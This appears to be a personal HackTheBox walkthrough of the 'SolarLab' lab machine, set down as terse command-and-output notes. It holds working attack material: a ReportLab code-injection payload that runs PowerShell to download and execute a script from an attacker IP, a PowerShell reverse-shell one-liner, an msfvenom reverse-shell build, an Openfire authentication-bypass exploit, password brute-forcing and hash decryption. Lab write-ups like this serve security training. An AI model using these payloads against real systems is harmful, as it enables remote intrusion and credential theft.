HTB - SolarLab [Medium]
TCP Scan
> TARGET=10.129.61.108 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
6791/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- add entries
echo '10.129.61.108 solarlab.htb report.solarlab.htb' >> /etc/hosts
enum
- enum4linux
> enum4linux solarlab.htb
[x]
- subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://solarlab.htb/" -H "Host: FUZZ.solarlab.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
- dirsearch
dirsearch -u http://solarlab.htb/
[17:22:14] 403 - 555B - /assets/
[17:22:14] 301 - 169B - /assets -> http://solarlab.htb/assets/
[17:22:42] 301 - 169B - /images -> http://solarlab.htb/images/
[17:22:42] 403 - 555B - /images/
- smb
smbclient -N -L \\solarlab.htb
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
smbclient -N //solarlab.htb/Documents
- passwords found in details-file.xlsx
Alexander.knight@gmail.com al;ksdhfewoiuh
KAlexander dkjafblkjadsfgl
Alexander.knight@gmail.com d398sadsknr390
blake.byte ThisCanB3typedeasily1@
AlexanderK danenacia9234n
ClaudiaS dadsfawe9dafkn
report.solarlab.htb:6791
- guess work needed to login using the above passwords file,
blakeb:ThisCanB3typedeasily1@
hydra -C creds.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:F=not"
[x]
- generate a leaverequest at
http://report.solarlab.htb:6791/leaveRequest
, inspect the pdf
> strings output.pdf
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
- look for vulns r.e reportlab, found: https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897
- https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.88/shell.ps1")') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
travelApprovalForm
can be used for RCE, try the above payload, setup reverse shell
$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- request payload
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.88/shell.ps1\')') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
- get user flag
PS C:\Users\blake\desktop> type user.txt
f97f5b91b4a9b1a368805946dc7c36ac
root
- found a db file
PS C:\users\blake\documents\app\reports\instance> ls
Directory: C:\users\blake\documents\app\reports\instance
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/17/2023 12:11 PM 12288 users.db
- a small file, encode the file with base64 for transfer
$content = Get-Content -Path 'users.db' -Encoding Byte
$base64 = [Convert]::ToBase64String($content)
$base64 | Set-Content -Path 'output.txt'
Get-Content -Path 'output.txt'
- get pass for
alexanderk:HotP!fireguard
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard
- there is an instance of openfire running on
9090
> netstat -ano
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5976
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 364
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:6791 0.0.0.0:0 LISTENING 5976
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 316
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1544
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 652
TCP 10.129.61.108:139 0.0.0.0:0 LISTENING 4
TCP 10.129.61.108:55186 10.10.14.88:4444 ESTABLISHED 5324
TCP 127.0.0.1:5000 0.0.0.0:0 LISTENING 5924
TCP 127.0.0.1:5222 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5223 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5262 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5263 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5269 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5270 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5275 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5276 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:7070 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:7443 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2988
- prepare
chisel
for pivoting
PS C:\users\blake\desktop> curl http://10.10.14.88/chisel.exe -o chisel.exe
# On Kali
> chisel server -p 9999 --reverse
# update /etc/proxychains.conf
# comment out `proxy_dns` for nmap to work
socks5 127.0.0.1 <sock-port>
# On Pivot
# for specific port forwarding
.\chisel client --max-retry-count=1 10.10.14.88:9999 R:9090:localhost:9090
- found
Openfire, Version: 4.7.4
, vulnerable to https://github.com/miko550/CVE-2023-32315
> python3 CVE-2023-32315.py -t http://localhost:9090
Successfully retrieved JSESSIONID: node01bx31xpd0ogwb1hk51dnprk3is2.node0 + csrf: CO5C3JDciafMtKn
User added successfully: url: http://localhost:9090 username: nnf2la password: 0eojze
- follow the instruction on the reademe to upload a plugin for RCE
- create a reverse shell and upload to c:\users\public\
> sfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.88 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
# call the shell on the plugin page
> c:\users\public\shell.exe
> rlwrap nc -vnlp 5555
listening on [any] 5555 ...
connect to [10.10.14.88] from (UNKNOWN) [10.129.61.108] 55285
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\Openfire\bin>whoami
whoami
solarlab\openfire
- find embedded-db in openfire directory
> C:\Program Files\Openfire\embedded-db>type openfire.script
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
- use openfire password decrypter: https://github.com/c0rdis/openfire_decrypt?tab=readme-ov-file
> ava OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
- admin password:
ThisPasswordShouldDo!@
> $SecPassword = ConvertTo-SecureString 'ThisPasswordShouldDo!@' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
> $session = New-PSSession -Credential $Cred
> Invoke-Command -Session $session -scriptblock { type c:\users\administrator\desktop\root.txt }
3d5d56bc9bdffdf24e85212c1387503d
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack